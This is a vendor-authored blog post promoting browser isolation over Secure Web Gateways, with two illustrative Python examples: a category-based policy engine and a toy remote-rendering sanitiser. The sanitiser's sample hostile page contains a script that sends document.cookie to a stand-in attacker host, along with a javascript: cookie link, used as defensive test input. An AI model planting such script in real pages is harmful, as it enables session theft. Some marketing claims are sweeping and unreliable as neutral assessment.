Jason Steer, solutions architect - EMEA, Menlo Security

A perfect storm hit ICT departments in May 2017, when the UK National Health Service (NHS) learned first-hand about the direct impact of a particularly virulent class of malware: ransomware. Many NHS hospitals and trusts went offline and routine doctor appointments had to be cancelled. More importantly, the episode shows how ICT staff are overwhelmed, working with limited budgets and security approaches that simply do not keep up with web-borne threats.

Traditional security systems sound alarms and require a human to investigate each one, but staff time is always in short supply. Security administrators, who in smaller organisations are also the ICT staff, therefore find themselves in a no-win situation as they try to implement and enforce web security policies with Secure Web Gateway (SWG) appliances and cloud-based services.

These systems were not designed for staff efficiency and, by their nature, will not catch new malware, whether it arrives through a phishing campaign or a ransomware outbreak. SWG policies rest largely on two data points: site reputation, taken from reputation feeds, and site category, such as news, entertainment, weather or social media, used to tell good from bad.

A Secure Web Gateway sits between attacks and vulnerable targets, but it can only protect against what it knows. What if a site is unknown to the SWG and falls into no known category? Every site the gateway fails to recognise or categorise is a gap in its coverage, and the gateway has no verdict for it other than whatever default the administrator configured.

Administrators can either allow access to these uncategorised sites, accepting a higher malware risk, or deny access and deprive employees of information and data they need. The threat of contracting malware from the web is not only real; it materialises within seconds and can hit employees and critical enterprise systems all at once.
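To make the category and reputation gap concrete, here is a toy policy engine, added as an example and not code from the article or from any Menlo Security product. The category database, reputation feed and request log are constructed sample data and the hostnames are placeholders. It contrasts the classic two-verdict gateway, where every uncategorised host inherits the administrator's default, with a gateway that has a third verdict, isolate, available for exactly those hosts.

```python
"""Toy Secure Web Gateway policy engine (added example, not vendor code).

The category database, reputation feed and request log are constructed
sample data; none of the hostnames refer to real sites or feeds.
"""
from collections import Counter
from typing import Optional
from urllib.parse import urlsplit

# Constructed category database keyed by registrable domain.
CATEGORIES = {
    "bbc.co.uk": "news",
    "weather.com": "weather",
    "facebook.com": "social media",
    "nhs.uk": "health",
}

# Constructed reputation feed: hosts already known to be bad.
BAD_REPUTATION = {"malware-drop.example.net"}


def registrable_domain(host: str) -> Optional[str]:
    """Walk up the labels of a hostname until a categorised parent is found."""
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in CATEGORIES:
            return candidate
    return None


def categorise(url: str) -> str:
    """Reputation first, then category, otherwise 'uncategorised'."""
    host = urlsplit(url).hostname or ""
    if host in BAD_REPUTATION:
        return "malicious"
    parent = registrable_domain(host)
    return CATEGORIES[parent] if parent else "uncategorised"


def swg_decision(url: str, allowed: set, unknown_default: str) -> str:
    """Classic SWG: only allow or block exist, so an unknown site can only
    inherit the administrator's default verdict."""
    cat = categorise(url)
    if cat == "malicious":
        return "block"
    if cat == "uncategorised":
        return unknown_default
    return "allow" if cat in allowed else "block"


def isolation_decision(url: str, allowed: set) -> str:
    """Isolation-capable gateway: a third verdict routes anything that is
    not on a trusted category through the isolation platform, so the
    allow-or-block guess is never needed for unknown sites."""
    cat = categorise(url)
    if cat == "malicious":
        return "block"
    if cat in allowed:
        return "allow"
    return "isolate"


# Constructed request log (not real traffic).
REQUEST_LOG = [
    "https://www.bbc.co.uk/news/technology",
    "https://weather.com/forecast/london",
    "https://m.facebook.com/",
    "https://www.nhs.uk/conditions/",
    "https://newly-registered-tool.example/",        # unknown to the category DB
    "https://cdn.unknown-ad-network.example/ad.js",  # third-party ad host, unknown
    "https://malware-drop.example.net/payload",      # on the reputation feed
]

ALLOWED = {"news", "weather", "health"}


def summarise(policy, log) -> Counter:
    """Count verdicts a policy function produces over a request log."""
    return Counter(policy(u) for u in log)


if __name__ == "__main__":
    lenient = summarise(lambda u: swg_decision(u, ALLOWED, "allow"), REQUEST_LOG)
    strict = summarise(lambda u: swg_decision(u, ALLOWED, "block"), REQUEST_LOG)
    iso = summarise(lambda u: isolation_decision(u, ALLOWED), REQUEST_LOG)
    print("lenient SWG (unknown -> allow):", dict(lenient))
    print("strict SWG  (unknown -> block):", dict(strict))
    print("isolation   (unknown -> isolate):", dict(iso))
```

Run against the constructed log, the lenient gateway waves through both unknown hosts (including the ad host), the strict one blocks them along with the legitimate but unknown tool, and the isolation verdict absorbs all three without having to guess.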

The web – a big problem 

Today there are more than 500 million malware variants in existence, and malware can be found even on the world's most popular websites, delivered through the third-party ad networks those sites load in the background. Because of the speed and ease with which it spreads, malware has taken centre stage in most of the high-profile security breaches of 2017. The costs of these breaches run into the hundreds of millions, and businesses have been forced to adopt increasingly strict web security policies that still rely primarily on legacy Secure Web Gateway architectures.

An end to the guessing game 

Isolation technology, built on virtual containers and a remote rendering engine, removes the path by which malware reaches user devices via compromised or malicious websites and email. It is neither detection nor classification: the user's web session and all of its active content (Flash, JavaScript and so on), good or bad, is executed to completion inside a container on the isolation platform. Only safe, malware-free rendering information is delivered to the user's endpoint; no active content, JavaScript included, leaves the platform. Because the endpoint never executes web content, websites and legitimate content need not be blocked in the interest of security. In practice this moves the attack surface from every user's browser to the isolation platform and the narrow rendering channel between them, so that channel must carry nothing the endpoint could interpret as code, and any file downloads allowed through it still need their own controls.
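The following added example (not code from the article or from Menlo Security's platform) sketches that architecture in miniature: an "isolation side" parses an untrusted page with Python's standard-library HTML parser and emits only an inert list of drawing operations, and an "endpoint side" accepts nothing but that fixed op vocabulary. The sample page, the op names and the JSON encoding are all assumptions of the example; a real platform executes the page in a full browser engine and streams pixels or DOM-like updates, but the property demonstrated is the same: markup, attributes and script bodies never cross to the endpoint, and the endpoint rejects anything outside the vocabulary.

```python
"""Toy remote-rendering pipeline in the spirit of browser isolation.

Added example, not vendor code. The HTML below is a constructed hostile
page; the op vocabulary and JSON wire format are assumptions of this toy.
"""
from html.parser import HTMLParser
import json

# Elements whose content is active (or carries active content) and must
# never be forwarded to the endpoint in any form.
ACTIVE_ELEMENTS = {"script", "style", "object", "embed", "iframe", "applet", "noscript"}


class IsolationRenderer(HTMLParser):
    """Runs on the isolation platform: consumes untrusted markup and produces
    a flat draw list (text runs, link targets, line breaks). Tag names,
    attributes and script bodies are consumed here and never serialised."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.ops = []
        self._skip_depth = 0  # > 0 while inside an active element

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_ELEMENTS:
            self._skip_depth += 1
            return
        if self._skip_depth:
            return
        if tag == "a":
            href = dict(attrs).get("href") or ""
            # Only http(s) targets are forwarded; javascript:, data: etc. are dropped.
            if href.lower().startswith(("http://", "https://")):
                self.ops.append({"op": "link", "href": href})
        elif tag in ("p", "br", "div", "li", "h1", "h2", "h3"):
            self.ops.append({"op": "newline"})

    def handle_endtag(self, tag):
        if tag in ACTIVE_ELEMENTS and self._skip_depth:
            self._skip_depth -= 1

    def handle_data(self, data):
        if self._skip_depth:
            return
        text = " ".join(data.split())
        if text:
            self.ops.append({"op": "text", "text": text})


def render_on_isolation_side(html: str) -> str:
    """Return the serialised draw list, the only thing that crosses to the endpoint."""
    r = IsolationRenderer()
    r.feed(html)
    r.close()
    return json.dumps(r.ops)


# Endpoint-side vocabulary: op name -> the only fields it may carry.
ALLOWED_OPS = {"text": {"text"}, "link": {"href"}, "newline": set()}


def paint_on_endpoint(stream: str) -> str:
    """Runs on the endpoint: trusts nothing but the op vocabulary. An unknown op
    or an unexpected field is treated as a protocol violation, so even a
    compromised platform cannot smuggle something executable through."""
    lines = [""]
    for op in json.loads(stream):
        kind = op.get("op")
        if kind not in ALLOWED_OPS or set(op) - {"op"} - ALLOWED_OPS[kind]:
            raise ValueError("rejected op: %r" % (op,))
        if kind == "newline":
            lines.append("")
        elif kind == "text":
            lines[-1] += (" " if lines[-1] else "") + str(op["text"])
        elif kind == "link":
            lines[-1] += " <%s>" % op["href"]
    return "\n".join(l for l in lines if l)


def endpoint_accepts(stream: str) -> bool:
    """True if the endpoint would paint the stream, False if it rejects it."""
    try:
        paint_on_endpoint(stream)
        return True
    except ValueError:
        return False


# Constructed hostile page (sample input, not a real site).
SAMPLE_HTML = """
<html><body>
<h1>Quarterly report</h1>
<p>Download the <a href="javascript:alert(document.cookie)">report</a> or
visit <a href="https://intranet.example/reports">the portal</a>.</p>
<script>document.location='https://evil.example/?c='+document.cookie</script>
<object data="exploit.swf"></object>
<p onmouseover="steal()">Thanks.</p>
</body></html>
"""


def isolated_render(html: str) -> str:
    """Full round trip: isolation side renders, endpoint paints."""
    return paint_on_endpoint(render_on_isolation_side(html))


if __name__ == "__main__":
    print(isolated_render(SAMPLE_HTML))
```

The point of `paint_on_endpoint` validating the vocabulary is the caveat above: once execution moves off the endpoint, the rendering channel is the remaining trust boundary, so the endpoint must treat that channel as untrusted too rather than assume the platform is always honest.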

With isolation, administrators can open more of the Internet to their users without opening a path for attacks: uncategorised and otherwise blocked sites can be allowed safely, and the frustrating security-versus-productivity compromise of the past disappears.

The benefits of isolation are clear. Because no active web content reaches the endpoint, uncategorised sites present no additional risk. The cost of cleaning infected machines has always been high; isolation removes the web as a malware vector and drastically reduces the number of machines that must be reimaged. What about those Windows XP systems from ten years ago? Isolation reduces the urgency of patching every browser and plug-in vulnerability, because web content never reaches those machines; it covers only the web and email vectors, however, so it complements patching rather than replacing it. On SOC costs: isolation stops threats before traditional solutions would detect them, removing a whole class of erroneous and inaccurate malware alerts. Trouble tickets also fall, because employees can explore the web safely without submitting re-categorisation requests, and with re-categorisation gone the need for expensive experts to process those requests goes with it.

The case is clear for transitioning away from a traditional secure gateway approach to a fully new approach leveraging isolation technology in the fight against malware.

Contributed by Jason Steer, solutions architect - EMEA, Menlo Security

*Note: The views expressed in this blog are those of the author and do not necessarily reflect the views of SC Media or Haymarket Media.